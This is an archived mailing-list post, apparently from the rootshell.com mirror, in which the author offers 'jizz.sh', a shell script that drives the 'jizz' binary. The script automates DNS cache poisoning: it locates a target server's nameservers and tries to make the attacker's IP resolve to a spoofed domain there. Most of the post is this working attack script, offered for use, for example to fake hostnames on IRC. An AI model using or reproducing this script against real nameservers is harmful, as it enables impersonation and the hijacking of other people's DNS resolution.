home *** CD-ROM | disk | FTP | other *** search
-
- [ http://www.rootshell.com/ ]
-
- From: philbert <philbert@DATATRAX.NET>
- Subject: DNS "spoofing" simplified
-
- Alot of people ask about DNS spoofing and how common utilities like
- "jizz" work. Jizz and the like are not generally easy utilities to use
- even if you do have an authorative nameserver. The idea is not simple and
- the instructions with such utils arn't very self explanatory. On top
- of that, even if you understand it completelly with any of them you have
- to either know what the target is using as a cacheing nameserver or
- otherwise make a calculated guess. I wrote a script interface tonight to
- the commonly available jizz binary to make it a: alot simpler to
- understand and b: my script will automatically try to determine the
- destinations nameserver and cache the domain on it, so that the only thing
- required to enter after the nameserver info is set up is the IP of the
- client, domain name you want to spoof, and destination server (IRC server
- or what not). The script does the rest for you.
-
- Please do not email me asking where to get jizz. If you don't have
- it I'm not going to give it to you. Also the return email in the script
- does not have an MX *yet* so if you want to reach me I can be found on
- irc efnet as philbert.
-
- here is the script:
-
- --- begin jizz.sh ---
-
- #!/bin/sh
- #
- # This script requires perl and the latest version of sh-utils for calculations,
- # as well as other various standard unix utilities.
- #
- # This interface DOES NOT require you to know the cacheing nameserver of
- # the destination server, it will attempt to calculate it for you.
- #
-
- case "${3}" in
- "")
- echo
- echo "Intelligent DNS spoofer interface, by philbert."
- echo "(philbert@DataTrax.Net)"
- echo
- echo "usage: $0 <your ip> <spoofed domain> <irc/misc server>"
- echo "or: $0 <your ip> <spoofed domain> -ns <NS to cache fake domain>"
- echo
- exit 1
- ;;
- esac
-
- # ----------------------------------------------------------
- # Set the configurations for your nameserver here
-
- # The name of the nameserver this is running on:
- NS=ns3.datatrax.net
-
- # The IP address of the nameserver this is running on:
- IP=1.2.3.4
-
- # A domain that this nameserver is strictly authorative for:
- AUTH=spoof.datatrax.net
-
- # End of user configuration
- # ----------------------------------------------------------
-
- RAND=$RANDOM
- export RAND
-
- jizz $RAND.$AUTH. $NS $IP $AUTH $1 $2. >/dev/null &
- sleep 1
-
- if [ "$3" = "-ns" ]; then
-
- echo "echo "trying to cache $2 on $4..."
- nslookup -type=soa $RAND.$AUTH. $4 >/dev/null 2>&1
-
- echo "$1 is cached on $2 as `nslookup $1 $2 | grep Name | cut -c10-`
-
- exit 1
- else false ; fi
-
- NS=`host $3. | perl -n -e 's/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/print $1/e'`
- if [ "NS" = "" ]; then NS=$3; else NS=$NS; fi
-
- echo "trying to cache $2 on the server itself..."
-
- nslookup -type=soa $RAND.$AUTH. $NS >/dev/null 2>&1
-
- TEST=`nslookup $1 $3 | grep Name | cut -c10-`
-
- if [ "$TEST" = "$2" ]; then
- echo "Success!, $2 is cached on $3 as $1"
- else echo "Failed..."; fi
-
- RDEST=`nslookup $NS | grep Name | cut -c10-`
- if [ "$RDEST" = "" ]; then RDEST=$3; else RDEST=$RDEST; fi
-
- NS=`dnsquery $RDEST | grep "IN NS" | cut -f3- | cut -f2- -dS`
- if [ "$NS" = "" ]; then
- NS=`echo $RDEST | cut -f2- -d.`
- NS=`dnsquery $NS | grep "IN NS" | cut -f3- | cut -f2- -dS`
- else NS=$NS; fi
-
- CRUNCH=1
-
- while true ; do
-
- TARGET=`echo $NS | cut -f$CRUNCH -d" "`
-
- if [ "$TARGET" = "" ]; then
- killall -9 jizz >/dev/null &
- exit 1; else TARGET=$TARGET; fi
-
- echo "trying to cache $2 on $TARGET..."
- nslookup -type=soa $RAND.$AUTH. $TARGET >/dev/null 2>&1
- TEST=`nslookup $1 $TARGET | grep Name | cut -c10-`
-
- if [ "$TEST" = "$2" ]; then
- echo "Success!, $2 is cached on $TARGET as $1"
- else echo "Failed..."; fi
-
- CRUNCH=`expr $CRUNCH + 1`
-
- done
-
- --- end jizz.sh ---
-
